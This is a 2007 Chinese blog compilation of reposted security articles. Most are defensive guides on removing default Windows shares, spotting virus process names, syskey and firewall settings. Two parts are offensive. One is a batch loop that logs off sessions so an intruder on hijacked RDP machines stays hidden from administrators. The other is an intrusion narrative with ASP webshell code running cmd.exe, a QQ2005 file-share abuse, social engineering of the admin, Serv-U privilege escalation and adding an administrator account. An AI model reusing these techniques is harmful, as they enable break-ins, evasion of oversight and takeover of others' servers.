星期一, 三月 19, 2007

切断 Windows 服务器系统默认共享通道

切断 Windows 服务器系统默认共享通道

作者:smtk 来源:赛迪网安全社区

在Windows服务器系统中,每当服务器启动成功时,系统的C盘、D盘等都会被自动设置成隐藏共享,尽管通过这些默认共享可以让服务器管理维护起来更方便一些;但在享受方便的同时,这些默认共享常常会被一些非法攻击者利用,从而容易给服务器造成安全威胁。

如果你不想让服务器轻易遭受到非法攻击的话,就必须及时切断服务器的默认共享“通道”。下面,本文就为大家推荐以下几则妙招,以便让你轻松禁止掉服务器的默认共享。

功能配置法

这种方法是通过Windows XP或Windows 2003系统中的msconfig命令,来实现切断服务器默认共享“通道”目的的。使用该方法时,可以按照如下步骤来进行:

依次单击“开始”/“运行”命令,在随后出现的系统运行设置框中,输入字符串命令“msconfig”,单击“确定”按钮后,打开一个标题为系统配置实用程序的设置窗口;

单击该窗口中的“服务”选项卡,在其后打开的选项设置页面中,找到其中的“Server”项目,并检查该项目前面是否有勾号存在,要是有的话必须将其取消掉,最后单击一下“确定”按钮,以后重新启动服务器系统时,服务器的C盘、D盘等就不会被自动设置成默认共享了。

小提示:尽管Windows 2000服务器系统没有系统配置实用程序功能,但考虑到该系统的内核与Windows 2003系统内核比较接近,因此你可以将Windows 2003系统中的msconfig.exe文件和msconfig.chm文件直接复制到Windows 2000系统目录中,以后你也可以在该系统的运行对话框中,直接启动系统配置实用程序功能了。如果在启动该功能的过程中,遇到有错误提示窗口弹出时,你可以不必理会,不停单击“取消”按钮就可以看到系统配置实用程序设置窗口了。

“强行”停止法

所谓“强行”停止法,其实就是借助Windows服务器的计算机管理功能,来对已经存在的默认共享文件夹,“强制”停止共享命令,以便让其共享状态取消,同时确保这些文件夹下次不能被自动设置成共享。在“强行”停止默认共享文件夹的共享状态时,你可以按照下面的步骤来进行:

依次单击“开始”/“运行”命令,在打开的系统运行设置框中,输入字符串命令“compmgmt.msc”,单击“确定”按钮后,打开打开Windows服务器系统的“计算机管理”界面;

在该界面的左侧列表区域中,用鼠标逐一展开“系统工具”、“共享文件夹”、“共享”文件夹,在对应“共享”文件夹右边的子窗口中,你将会发现服务器系统中所有已被共享的文件文件夹都被自动显示出来了,其中共享名称后面带有“$”符号的共享文件夹,就是服务器自动生成的默认共享文件夹;

要取消这些共享文件夹的共享状态,你只要先用鼠标逐一选中它们,然后再用右键单击之,在其后打开的快捷菜单中,选中“停止共享”选项,随后屏幕上将打开一个如图2所示的对话框,要求你确认一下是否真的想停止已经选择的共享,此时你再单击一下“是”按钮,所有选中的默认共享文件夹的共享标志就会自动消失了,这表明它们的共享状态已经被“强行”停止了,以后哪怕是重新启动服务器系统,服务器的C盘、D盘也不会被自动设置成默认共享了。

逐一删除法

所谓“逐一删除法”,其实就是借助Windows服务器内置的“net share”命令,来将已经处于共享状态的默认共享文件夹,一个一个地删除掉(当然这里的删除,仅仅表示删除默认共享文件夹的共享状态,而不是删除默认文件夹中的内容),但该方法有一个致命的缺陷,就是无法实现“一劳永逸”的删除效果,只要服务器系统重新启动一下,默认共享文件夹又会自动生成了。在使用该方法删除默认共享文件夹的共享状态时,可以参考如下的操作步骤:

首先在系统的开始菜单中,执行“运行”命令,打开系统运行设置框,在该对话框中输入字符串命令“cmd”后,再单击“确定”按钮,这样Windows服务器系统就会自动切换到DOS命令行工作状态;

然后在DOS命令行中,输入字符串命令“net share c$ /del”,单击回车键后,服务器中C盘分区的共享状态就被自动删除了;如果服务器中还存在D盘分区、E盘分区的话,你可以按照相同的办法,分别执行字符串命令“net share d$ /del”、“net share e$ /del”来删除它们的共享状态;

此外,对应IP$、Admin$之类的默认共享文件夹,你们也可以执行字符串命令“net share ipc$ /del”、“net share admin$ /del”,来将它们的隐藏共享状态取消,这样的话非法攻击者就无法通过这些隐藏共享“通道”,来随意攻击Windows服务器了。

“自动”删除法

如果服务器中包含的隐藏共享文件夹比较多的话,依次通过“net share”命令来逐一删除它们时,将显得非常麻烦。其实,我们可以自行创建一个批处理文件,来让服务器一次性删除所有默认共享文件夹的共享状态。在创建批处理文件时,只要打开类似记事本之类的文本编辑工具,并在编辑窗口中输入下面的源代码命令:

  @echo off

  net share C$ /del

  net share D$ /del

  net share ipc$ /del

  net share admin$ /del

  ……

完成上面的代码输入操作后,再依次单击文本编辑窗口中的“文件”/“保存”菜单命令,在弹出的文件保存对话框中输入文件名为“delshare.bat”,并设置好具体的保存路径,再单击一下“保存”按钮,就能完成自动删除默认共享文件夹的批处理文件创建工作了。以后需要删除这些默认共享文件夹的共享状态时,只要双击“delshare.bat”批处理文件,服务器系统中的所有默认共享“通道”就能被自动切断了。

防止网管用Query User察看终端登陆用户

作者:lvvl 来源:赛迪网安全社区

相信大家一定有自己的3389的肉机,可是你有没有想过,当你再登陆的时候也许管理员也在线呢?

如果是一个懂黑客技术的网管一定会用Query User来察看终端登陆的用户,这样的话你的登陆就会暴露给管理员,估计这样的话你的肉机用的时间也长不了了。今天无意间学习DOS下的编程,想到了一个程序可以很方便的在管理员的眼皮底下溜走,下面给出这个程序,仅供参考。

:begin

query user|fine "console"

if errorlevel 1 logoff 1&&logoff 2

goto begin

程序的原理很简单,就是只要有人用Query User的时候就执行logoff。logoff的意思就是注销这个回话,当然管理员也就不会知道你登陆了。这个程序只要保存成.bat就行了,登陆一次执行一次。

保护系统 教你如何防范自己的IP泄漏

作者:lvvl 来源:赛迪网安全社区 

在正式进行各种“黑客行为”之前,黑客会采取各种手段,探测(也可以说“侦察”)对方的主机信息,以便决定使用何种最有效的方法达到自己的目的。来看看黑客是如何获知最基本的网络信息——对方的IP地址;以及用户如何防范自己的IP泄漏。

获取IP

“IP”作为Net用户的重要标示,是黑客首先需要了解的。获取的方法较多,黑客也会因不同的网络情况采取不同的方法,如:在局域网内使用Ping指令,Ping对方在网络中的名称而获得IP;在Internet上使用IP版的QQ直接显示。而最“牛”,也是最有效的办法是截获并分析对方的网络数据包。这是用Windows 2003的网络监视器捕获的网络数据包,可能一般的用户比较难看懂这些16进制的代码,而对于了解网络知识的黑客,他们可以找到并直接通过软件解析截获后的数据包的IP包头信息,再根据这些信息了解具体的IP。

隐藏IP

虽然侦察IP的方法多样,但用户可以隐藏IP的方法同样多样。就拿对付最有效的“数据包分析方法”而言,就可以安装能够自动去掉发送数据包包头IP信息的一些软件。不过使用这些软件有些缺点,譬如:它耗费资源严重,降低计算机性能;在访问一些论坛或者网站时会受影响;不适合网吧用户使用等等。现在的个人用户采用最普及隐藏IP的方法应该是使用代理,由于使用代理服务器后,“转址服务”会对发送出去的数据包有所修改,致使“数据包分析”的方法失效。一些容易泄漏用户IP的网络软件(QQ、MSN、IE等)都支持使用代理方式连接Internet,特别是QQ使用“ezProxy”等代理软件连接后,IP版的QQ都无法显示该IP地址。这里笔者介绍一款比较适合个人用户的简易代理软件——网络新手IP隐藏器,只要在“代理服务器”和“代理服务器端”填入正确的代理服务器地址和端口,即可对http使用代理,比较适合由于IE和QQ泄漏IP的情况。

不过使用代理服务器,同样有一些缺点,如:会影响网络通讯的速度;需要网络上的一台能够提供代理能力的计算机,如果用户无法找到这样的代理服务器就不能使用代理(查找代理服务器时,可以使用“代理猎手”等工具软件扫描网络上的代理服务器)。

虽然代理可以有效地隐藏用户IP,但高深的黑客亦可以绕过代理,查找到对方的真实IP地址,用户在何种情况下使用何种方法隐藏IP,也要因情况而论。

另外防火墙也可以在某种程度上使用IP的隐藏,如ZoneAlarm防火墙就有一个隐藏在网上的IP的功能。

全方位多角度综合对内网安全进行防护

作者:明朝万达 来源:赛迪网

随着信息化程度的提高,网络成为众多企事业单位不可或缺的办公工具,甚至政府机关也已经将网络化办公当作未来办公的标准来铺建内部的办公网络。众所周知,网络化的普及大大的提高了工作效率、降低了办公成本,但是,伴随着网络的普及,网络安全问题成为众多企事业单位需要广泛重视、重点解决的首要问题。

内网安全需求凸显

一提起网络安全,大家印象中第一个会联想到病毒的入侵、黑客的攻击致使整个网络瘫痪而无法正常工作,这只是网络安全的一个方面,在行业内统称这类的安全问题为外网安全,目前针对外网安全的专业厂家众多,产品线也非常地完善,各种基于局域网的杀毒软件、防火墙产品已经基本上可以保护企业网络不受外部攻击的伤害。然而在外网安全体系越来越完善的同时,内部的网络安全问题却异军突起,成为目前困扰企业网络安全的一个大问题。

一般来讲,内网安全风险是指由于内部因素造成的企业机密信息的泄漏而给企业带来的风险和损失。目前企业内网常常存在种种隐患,使企业面临机密信息被泄露的危险。员工有意无意地泄密、跳槽时带走机密资料……种种泄密途径,考验着企业内网的每一根神经,也让企业领导寝食不安。稍有不慎,公司就有可能一夜之间处在商业危机的边缘。据美国FBI统计,83%的信息安全事故为内部人员和内外勾结所为,而且呈上升的趋势。从这一数字可见,内网安全的重要性不容忽视。据公安部最新统计,70%的泄密犯罪来自于内部;电脑应用单位80%未设立相应的安全管理系统、技术措施和制度。为此,内网安全成为目前众多企事业单位在解决了外网安全之后必然要面对的问题,因此内网安全的市场相信也会在很短的时间内会有较大的成长空间。

对内网安全认识上的误区

内网安全概念的提出和发展虽然经历了多年,但是目前尚没有形成统一的认识,究其根源,很大程度上在于众多企业仍然对内网安全认识上存在很大的误区,从而影响了企业对内网安全的重视程度。这些认识误区很大程度上因为缺乏相关的标准和政策指引所致。目前市场上对内网安全的认识误区主要分成以下三个方面:

1)监控审计就是内网安全。监控审计系统主要提供了内网安全用户行为和计算机使用的事后审计功能,同时针对部分计算机外设资源、移动存储设备和网络资源等的使用提供了一定的控制措施。

2)终端管理就是内网安全。终端管理系统主要提供了包括补丁分发、外设管理和网络管理等功能。

3)数据加密就是内网安全。数据加密系统主要提供对用户核心文档资料的加密和保护,防止用户内网人员有意或者无意将信息泄漏。

上述观点一直以来对内网安全体系的构建形成了误导,希冀通过单一的产品解决内网安全面临的问题。而事实上,内网的安全需要在事前的防范、事件发生时的监控以及在事件发生后的审计方面层层把关才能构造一个完整的内网安全体系,因此,传统的安全产品很难构造如此完整的内网安全体系。

Chinasec的全新内网安全理念

针对内网安全市场的独特需求,作为业内最早切入内网安全市场的公司之一,明朝万达公司的内网安全理念无疑更具整体性和一致性。明朝万达以Chinasec品牌为核心的内网安全整体解决方案,立足于事前防范、事中监控、事后审计,可以协助组织构建比较完整的内网安全技术体系。

在Chinasec内网安全专家看来,内网安全作为一个全新的领域之所以被提出来,其根本在于随着信息化程度的提高,使内网信息系统的复杂性急速增加而导致了内网信息系统安全问题的复杂化,网络终端、内网使用者、网络设备和服务器群等构成了一个复杂的内网信息系统,原有简单的安全威胁模型和粗粒度的控制防护措施不再有效,从而诞生了以复杂安全威胁模型和细粒度的控制防护为特点的内网安全领域。

Chinasec内网安全专家指出,一个完整的内网安全解决方案,应该从关注计算机终端、服务器、信息网络和信息应用系统等多个方面着手,基于“事前防范、事中控制、事后审计”的基本思路,形成“以身份认证为基础、以数据安全和授权管理为核心、以监控审计为辅助”的全方位的内网信息安全管理体系。

作为内网安全,或者桌面安全的核心,数据安全要求做到的是严格的事前防范,而不是安全事件发生后的审计。身份认证是内网安全的基础,只有确定了用户和设备身份,才能进一步施行具体的管理措施。授权管理针对内网的所有资源进行授权,包括PC、服务器资源、PC内部的外设资源、网络资源、应用程序资源等,可以根据公司管理规则进行授权设定。监控审计提供了对整个内网的实时状态监控和风险控制能力,对所有设备和资源的使用情况、用户行为和网络状况等都有详细的记录,并应该提供报警和实时响应功能。

作为一个完整的内网安全体系,上述四个方面不是相互独立和割裂的,也不是各个产品功能的简单堆砌,而必须是部署管理整体一致、策略实施相互联动。要构建一个整体一致的内网安全解决方案,对内网安全产品研发生产厂商的信息安全管理经验、产品综合研发能力和用户需求把握能力提出了非常高的要求,这也是目前绝大部分内网安全厂商仅能提供片面的解决方案的主要原因。

明朝万达以其核心团队长达10年的信息安全研发经验和长达5年的内网安全专注经验,结合其来自各政府信息安全主管部门和行业应用部门的资深专家团队,以9个核心专利技术和10多个软件著作权为支撑,为用户提供了完全具有自主知识产权的Chinasec整体一致内网安全解决方案。

系统关键进程的查看和比较

系统关键进程的查看和比较

我们都知道进程是系统当前运行的执行程序,所以打开系统进程列表来查看哪些进程正在运行,通

过进程名及路径判断和比较是否有病毒是一种经常做的常规工作,如果怀疑病毒进程只要记下它的进程

名,结束该进程,然后删除病毒程序即可。但是哪些是正常进程哪些不是正常的进程呢?

1 、查看进程的方法

A。用三键大法:按Ctrl+Alt+Del组合键,然后单击“任务管理器”,打开“Windows 任务管理

器”,然后单击“进程”标签即可查看。

B。右击任务条,打开任务管理器,然后看“进程”也可以。我常用的就是这个了。

2。进程的具体路径

开始→程序→附件→系统工具→系统信息→软件环境→正在运行的任务。是不是看到了。。

3。比较关键的进程

(1)Csrss.exe:这是子系统服务器进程,负责控制Windows创建或删除线程以及16位的虚拟DOS环境。这个是不能关的。。

(2)Lsass.exe:管理IP安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序。这个也不是能关的。。。

(3)Explorer.exe:资源管理器。这个知道是什么吧?你关一下试试看,呵呵。关了以后别怕啊。可以再在任务管理器中的新任务中再建一个。。。

(4)Smss.exe:这是一个会话管理子系统,负责启动用户会话。这个不能关的。。。

(5)Services.exe:系统服务的管理工具,包含很多系统服务。当然也不能关的。。

(6)system: Windows系统进程,当然不关。

(7)System Idle Process:这个进程是作为单线程运行在每个处理器上,并在系统不处理其它线程的时候分派处理器的时间。晕,这个大家一看就知道。

(8)Spoolsv.exe:管理缓冲区中的打印和传真作业。不能关的。

(9)Svchost.exe:系统启动的时候,Svchost.exe将检查注册表中的位置来创建需要加载的服务列表,如果多个Svchost.exe同时运行,则表明当前有多组服务处于活动状态;多个DLL文件正在调用它。

WINXP一般是五个进程,记住!

(10)winlogon.exe: 管理用户登录,你关关试试看,重新启动了不是??

(11)internat.exe这是什么东西?呵呵。输入法了。

(12)taskmagr.exe这又是什么?就是任务管理器!

(13) systray.exe是哪儿冒出来的。什么东西。呵呵。右下角的小喇叭。

4。常见病毒的进程名

avserve.exe 震荡波病毒的进程

java.exe、services.exe MyDoom 病毒的进程

svch0st.exe、expl0er、user32.exe 网银大盗的进程

dllhost.exe 冲击波病毒的进程

Avpcc.exe → 将死者病毒 Msgsrv36.exe → Coma

Avpm.exe → 将死者病毒 Msgsvc.exe → 火凤凰

Avserve.exe → 震荡波病毒 Msgsvr16.exe → Acid Shiver

Bbeagle.exe → 恶鹰蠕虫病毒 Msie5.exe → Canasson

Brainspy.exe → BrainSpy vBeta Msstart.exe → Backdoor.livup

Cfiadmin.exe → 将死者病毒 Mstesk.exe → Doly 1.1-1.5

Cfiaudit.exe → 将死者病毒 Netip.exe → Spirit 2000 Beta

Cfinet32.exe → 将死者病毒 Netspy.exe → 网络精灵

Checkdll.exe → 网络公牛 Notpa.exe → Backdoor

Cmctl32.exe → Back Construction Odbc.exe → Telecommando

Command.exe → AOL Trojan Pcfwallicon.exe → 将死者病毒

Diagcfg.exe → 广外女生 Pcx.exe → Xplorer

Dkbdll.exe → Der Spaeher Pw32.exe → 将死者病毒

Dllclient.exe → Bobo Recycle - Bin.exe → s**tHeap

Dvldr32.exe → 口令病毒 Regscan.exe → 波特后门变种

Esafe.exe → 将死者病毒 Tftp.exe → 尼姆达病毒

Expiorer.exe → Acid Battery Thing.exe → Thing

Feweb.exe → 将死者病毒 User.exe → Schwindler

Flcss.exe → Funlove病毒 Vp32.exe → 将死者病毒

Frw.exe → 将死者病毒 Vpcc.exe → 将死者病毒

Icload95.exe → 将死者病毒 Vpm.exe → 将死者病毒

Icloadnt.exe → 将死者病毒 Vsecomr.exe → 将死者病毒

Icmon.exe → 将死者病毒 Server.exe → Revenger, WinCrash, YAT

Icsupp95.exe → 将死者病毒 Service.exe → Trinoo

Iexplore.exe → 恶邮差病毒 Setup.exe → 密码病毒或Xanadu

Rpcsrv.exe → 恶邮差病毒 Sockets.exe → Vampire

Rundll.exe → SCKISS爱情森林 Something.exe → BladeRunner

Rundll32.exe→ 狩猎者病毒 Spfw.exe → 瑞波变种PX

Runouce.exe → 中国黑客病毒 Svchost.exe (线程105) → 蓝色代码

Scanrew.exe → 传奇终结者 Sysedit32.exe → SCKISS爱情森林

Scvhost.exe → 安哥病毒 Sy***plor.exe → wCrat

Server 1. 2.exe → Spirit 2000 1.2fixed Sy***plr.exe → 冰河

Intel.exe → 传奇叛逆 Syshelp.exe → 恶邮差病毒

Internet.exe → 传奇幽灵 Sysprot.exe → Satans Back Door

Internet.exe → 网络神偷 Sysrunt.exe → Ripper

Kernel16.exe → Transmission Scount System.exe → s**tHeap

Kernel32.exe → 坏透了或冰河 System32.exe → DeepThroat 1.0

Kiss.exe → 传奇天使 Systray.exe → DeepThroat 2.0-3.1

Krn132.exe → 求职信病毒 Syswindow.exe → Trojan Cow

Libupdate.exe → BioNet Task_Bar.exe → WebEx

Load.exe → 尼姆达病毒 Taskbar → 密码病毒 Frethem

Lockdown2000.exe → 将死者病毒 Taskmon.exe → 诺维格蠕虫病毒

Taskmon32 → 传奇黑眼睛 Tds2-98.exe → 将死者病毒

Tds2-Nt.exe → 将死者病毒 Temp $01.exe → Snid

Tempinetb00st.exe → The Unexplained Tempserver.exe → Delta Source

Vshwin32.exe → 将死者病毒 Vsstart.exe → 将死者病毒

Vw32.exe → 将死者病毒 Windown.exe → Spirit 2000 1.2

Windows.exe → 黑洞2000 Winfunctions.exe → Dark Shadow

Wingate.exe → 恶邮差病毒 Wink????.exe → 求职信病毒

Winl0g0n.exe → 笑哈哈病毒 Winmgm32.exe → 巨无霸病毒

Winmsg32.exe → Xtcp Winprot.exe → Chupachbra

Winprotecte.exe → Stealth Winrpc.exe → 恶邮差病毒

Winrpcsrv.exe → 恶邮差病毒 Winserv.exe → Softwarst

Wubsys.exe → 传奇猎手 Winupdate.exe → Sckiss爱情森林

Winver.exe → Sckiss爱情森林 Winvnc.exe → 恶邮差病毒

Winzip.exe → ShadowPhyre Wqk.exe → 求职信病毒

Wscan.exe → AttackFTP Xx.Tmp.exe → 尼姆达病毒

Zcn32.exe → Ambush Zonealarm.exe → 将死者病毒

注意:进程名为nvsvc32.exe,Drwtsn32.exe和Rundl32.exe是系统正常的进程外,其余的凡是带

32数字你可要注意一下.这很可能就是病毒进程;Expiorer.exe → Acid Battery 你看它只和资源

管理器的EXPLORER一字之差,小心了;凡是1.EXE 2.exe 0.exe 之类一列不是好东西!当然我们

也要小心了例如魔波会利用SVCHOST进程(它是全大写)可怕的··

5。如何处理可疑进程

(1).试验法

将可疑进程结束后,通过“开始→搜索→文件或文件夹”,然后输入可颖进程名作为关键字对硬盘进行

搜索,找到对应的程序后,记下它的路径,将它移到U盘或软盘上,然后对电脑上的软件都运行一遍,

如果都能正常运行,说明这个进程是多余的或者是病毒,就算不是病毒把它删了也可给系统减肥。如果

有软件不能正常运行则要将它还原。

(2).搜索求救法

如果你对“不明进程”是否是病毒拿不定主意,可以把该进程的全名为关键字在百度或GOOGLE搜索

引擎上搜索,找它的相关资料看它是不是病毒,如果是则赶快删除。

(3)软件法

赶快到安全模式下去用杀毒软件吧,当然必须是升级到最新杀软!

用syskey命令加强Windows2000/XP系统安全

[zt]

在Windows XP和Windows 2000系统中有一个我不一般不常用,但是功能强大的命令,那就是:syskey命令。

这个命令可以有效地增强你的系统安全性。也许你要说不是进入Windows XP或Windows 2000的时候已经要输入帐户和密码了吗,这样还不安全吗?著名的WIN 2000的输入法漏洞你总该听说过吧,如果你的电脑是多人使用,其他人完全可以通过破取他人的简单密码来进入系统,利用种种漏洞来获取管理员权限。有了syskey制作的加密软盘,你就可以完全放心的使用2000和XP了。下面我们来看看syskey命令的用法。

一、双重密码保护的设置

1.在开始菜单的“运行”中输入“syskey”,点击确定。

2.这个界面所提到的帐户数据库便是NTFS加密的原理所在,对于我们一般用户,不需要去研究原理,我们只要会用就好。下一步点击“更新”。

3.这里我们选择密码启动,输入一个密码,然后点击确定。这样做将使WINXP在启动时需要多输入一次密码,起到了2次加密的作用。操作系统启动时在往常我们输入用户名和密码之前会出现窗口提示“本台计算机需要密码才能启动,请输入启动密码”。这便是我们刚刚创造的第一重密码保护。

二、密码软盘的制作

1.如果我们选择"在软盘上保存启动密码",这样将生成一个密码软盘,没有这张软盘,谁也别想进入你的操作系统.当然,如果你之前设置了syskey系统启动密码,这里还会需要你再次输入那个密码的,以获得相应的授权,这有点类似我们在更改QQ密码的时候,必须要知道原来的密码一样。

2.然后系统会提示你在软驱中放入软盘,当密码软盘生成后会出现提示。

3.然后我们再次启动系统,这时系统会提示你插入密码软盘,如果你不插入软盘就点击确定,系统是不会给你放行的。

插入密码软盘,根据不同帐户,输入不同的密码。同时如果你愿意,密码软盘中的密匙文件是可以复制到其他软盘上的。

三、去除密码软盘的高安全性要求

假如有一天,你对操作系统的安全性要求不那么高了,而你也厌烦了每次进入系统都需要插入软盘,怎么办?选择“在本机上保存启动密码”就可以了,当然,进行这一步操作你必须要有存有密匙的软盘,这与密码软盘制作时要求输入授权密码是一个道理的。

利用QQ文件共享漏洞入侵 Windows2003

利用QQ文件共享漏洞入侵 Windows2003

作者:smtk 来源:赛迪网安全社区

服务器上运行的第三方软件历来就被攻击者们看作是入侵目标系统的捷径。现在,著名的腾讯QQ又被列入了这些捷径名单,好在QQ并不是服务器必备的软件之一,所以相信不会造成大范围的危机。文中遇到特殊情况虽然不多,但大家还是应该遵照“可能的就应该防范”的原则做出相应防御。

一、在Windows2003中得到的Webshell

此次渗透的目标是一台OA办公系统服务器。其操作系统新近升级到了Windows2003,但OA仍存在asp文件上传漏洞,所以webshell的取得并没有任何悬念。阻碍是在权限提升时遇到的。

登陆webshell后发现只能查看服务器的D盘,对C盘不能进行任何访问,webshell的提示是“没有权限”。这点早在意料之中,因为wenshell只有guests组权限,再加上win2003默认禁止了“Everyone"匿名用户及“Guest"组权限用户访问cmd.exe,还造成了不能通过webshell运行cmd.exe。

唯一值得庆幸的是利用Webshell 可以对D盘(存放有web虚拟目录)各个子目录进行读写。这里除了web虚拟目录还有一些数据备份文件和一个腾讯QQ安装目录Tencent。

二、破解Serv-u的终极防范

Windows2003的种种默认安全配置展示了它强大的一面,近一步提升现有权限似乎已不太可能,直到我试图从系统入手向这台服务器发出FTP链接请求并看到Serv-u的banner时才觉得又有了一线希望。

前面提到由于Windows2003对cmd.exe的权限限制,通过webshell方式不能运行cmd.exe,这样的论断在2004年6期的防线的《构建Windows2003堡垒主机》一文也曾提到,但实践表明这并不正确,通过webshell上传本地非2003系统中未受限制的cmd.exe文件到可执行目录,再通过wscript组件,同样能够通过webshell方式在Windows2003下获得相应权限的cmd.exe。结合nc.exe,甚至还能得到一个guest组权限的命令行下的shell。

为此,我对老兵的站长助手6.0做了一些改进,增加了如下代码,使其能够利用Wscript.shell组件运行本地上传的cmd.exe。

Function CmdShell()
If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
ShellPath=Session("ShellPath")
if ShellPath="" Then ShellPath = "cmd.exe"
if Request("wscript")="yes" then
checked=" checked"
else
checked=""
end if
If Request("cmd")<>"" Then DefCmd = Request("cmd")
SI="<form method='post'><input name='cmd' Style='width:92%' class='cmd'
value='"DefCmd&"'><input type='submit' value='运行'>"
SI=SI&"<textarea Style='width:100%;height:500;' class='cmd'>"
If Request.Form("cmd")<>"" Then
if Request.Form("wscript")="yes" then
Set CM=CreateObject(ObT(1,0))
Set DD=CM.exec(ShellPath&" /c "DefCmd)
aaa=DD.stdout.readall
SI=SI&aaa
else%>
<object runat=server id=ws scope=page classid="clsid:72C24DD5-D70A-438B-8A42-
98424B88AFB8"></object>
<object runat=server id=ws scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-
00C04FD58A0B"></object>
<object runat=server id=fso scope=page classid="clsid:0D43FE01-F093-11CF-8940-
00A0C9054228"></object>
<%szTempFile = server.mappath("cmd.txt")
Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)
Set fs = CreateObject("Scripting.FileSystemObject")
Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0)
aaa=Server.HTMLEncode(oFilelcx.ReadAll)
oFilelcx.Close
Call fso.DeleteFile(szTempFile, True)
SI=SI&aaa
end if
End If
SI=SI&chr(13)&"</textarea>"
SI=SI&"SHELL路径:<input name='SP' value='"&ShellPath&"' Style='width:70%'> "
SI=SI&"<input type='checkbox' name='wscript' value='yes'"&checked&">WScript.Shell</form>"
Response.Write SI
End Function

利用时只需在shell路径中指定上传的cmd.exe路径,再选中选项Wscript就能运行一些所需权限较低的系统命令,如“net start”或者“netstat -an”,依次运行这两个命令后Webshell回显了众多服务,包括Serv-U FTP Server。

活动端口列表中又出现了43958端口,于是我自然想到了神通广大的Serv-u ftp Server本地权限提升漏洞。可真正用到的ftp本地权限提升工具在执行系统命令时,却出现了530错误提示。看来管理员或者其他人对Serv-u打上了布丁或者做了某些安全配置。

为了知道究竟是怎样的安全配置,上网查了查相关文章,其中有一篇《Serv-u ftp Server 本地权限提升漏洞的终极防范》很受欢迎,被多方转载,作者是世外高人xiaolu。从错误提示看很有可能做了该文所谓的终极防范,即对ServUDaemon.exe中默认的管理员或密码进行了修改。

当然这只是假设,只有将目标服务器上的ServUDaemon.exe下载下来看看具体配置才能确定,但是安装有Serv-u的C盘禁止访问,包括Programe files 目录,权限提升再次受阻。

三、利用QQ2005共享文件漏洞将权限提升到底

再次翻了翻D盘,又见到了那个很少能在服务器中看到的Tencent文件夹。查看whatsnew.txt。

得知QQ的版本是QQ2005 Beta1,几个于相关文件的创建时间也说明网管最近在服务器上登陆过QQ。难道只能用QQ?经过一番思索,终于想到一个可以利用的QQ2005在文件共享功能上的一则漏洞。

该漏洞是随着QQ2005贺岁版新增功能出现的。可以将其危害描述为:利用该漏洞,攻击者可以浏览,读取用户系统中的任意文件(如sam文件、数据备份文件、敏感信息文件)。影响系统:安装有QQ2005贺岁版以上的所有Windows系列操作系统。

具体利用方法是:先在本机登陆自己的QQ,调出“QQ菜单”,选择工具->设置共享,指定C:\或者其他任何有利用价值的分区为共享文件,完成后关闭QQ,找到安装目录下的以QQ帐号命名的文件夹内“ShareInfo.db”文件。上传覆盖目标服务器上相同文件(如:D:\Tencent\QQ\654321\ShareInfo.db)。这样,当网管在服务器上登陆QQ时就会向好友开放C盘为共享目录。

因为陌生人是不能共享对方文件,所以还需要用社会工程学申请将管理员加为好友(理由当然越可信越好)。如果管理员通过请求,服务器的C盘会以QQ共享文件目录的名义被共享,原本不能通过WEBSHELL访问的ServUDaemon.exe文件就能被下载,遇到阻碍的权限提升之路又能继续了。

当晚管理员就通过了申请,将我添加为好友。珊瑚虫QQ上显示的IP正是目标服务器的IP,于是下载了ServUDaemon.exe文件,用UE打开后查找127.0.0.1,发现默认配置下的内置帐户“LocalAdministrator”果然被改成了“LocalAdministruser”。

这看起来是一个很“终极”的防御,但提出该方法的xiaolu似乎没有进行攻防所须的换位思考就将其公布,要知道攻击者只需知道修改后的配置,并对本地权限提升利用工具进行相应的修改,所谓的终极防御也就被攻破了。方法还是用UE打开脱了壳的serv-u本地权限提升利用工具,将LocalAdministrator改为LocalAdministruser即可。

然后上传修改后的ftp2.exe,在wscript.shell中执行D:\web\ftp2.exe “net user user password /add”后看看结果,已经成功添加了一个用户。再把该用户加入administrators组和“Remote desktop users”组后登陆了目标服务器的远程桌面。

经过重重险阻,终于彻底攻陷了这台坚固的Windows2003堡垒。

四、简单启示

可以看出,和“服务越少越安全”一样,服务器上运行的“第三方”越少越安全,流行的PcAnywhere、VNC、Serv-U 权限提升和这里提出的利用QQ2005提升权限,都是可以这样避免。

经验谈:家庭用户如何使用防火墙软件

经验谈:家庭用户如何使用防火墙软件

作者:lvvl 来源:赛迪网安全社区

由于黑客泛滥,所以为了防止恶意攻击,防火墙软件应运而生。但是我们应该能够正确使用防火墙软件,让它真正为我们服务。

防火墙都定义了安全级别,为了给不同需要的用户不同的安全控制,但是很多用户并不是特别懂这些,为了安全,就盲目的把安全级别调整到“高安全级”,认为安全级别越高越好。其实不是这样。如果你的电脑太安全了,你会发现网络游戏就无法启动了,而且视频程序也就无法访问到网上的视频文件了(这对于ADSL用户是一个极大损失)。那么到底各种安全级别是什么意思呢?

低安全级:计算机将开放所有服务,但禁止互联网上的机器访问文件、打印机共享服务。适用于在局域网中的提供服务的用户。这是自由度最大的安全级别,所以仅限于“网络高手”使用。

中安全级:禁止访问系统级别的服务( 如HTTP , FTP等)。局域网内部的机器只允许访问文件、打印机共享服务。 使用动态规则管理,允许授权运行的程序开放的端口服务,比如网络游戏或者视频语音电话软件提供的服务。而且能够保证例如收发邮件和传输文件的一般用户,所以一般这个安全级别是缺省值。

高安全级:系统会屏蔽掉向外部开放的所有端口;禁止访问本机提供所有服务,对常见的木马程序和攻击进行拦截;提供严格控制的网络访问能力;适用于仅仅是上网浏览网页的用户。当然网络游戏你就玩不了了。

另外,所有的安全级都会控制应用程序访问网络的权限。

深入防火墙记录

[转帖]

本文将向你解释你在防火墙的记录(Log)中看到了什么?尤其是那些端口是什么意思?你将能利用这些信息做出判断:我是否受到了Hacker的攻击?他/她到底想要干什么?本文既适用于维护企业级防火墙的安全专家,又适用于使用个人防火墙的家庭用户。

  一、目标端口ZZZZ是什么意思

  所有穿过防火墙的通讯都是连接的一个部分。一个连接包含一对相互“交谈”的IP地址以及一对与IP地址对应的端口。目标端口通常意味着正被连接的某种服务。当防火墙阻挡(block)某个连接时,它会将目标端口“记录在案”(logfile)。这节将描述这些端口的意义。

  端口可分为3大类:

  1) 公认端口(Well Known Ports):从0到1023,它们紧密绑定于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。

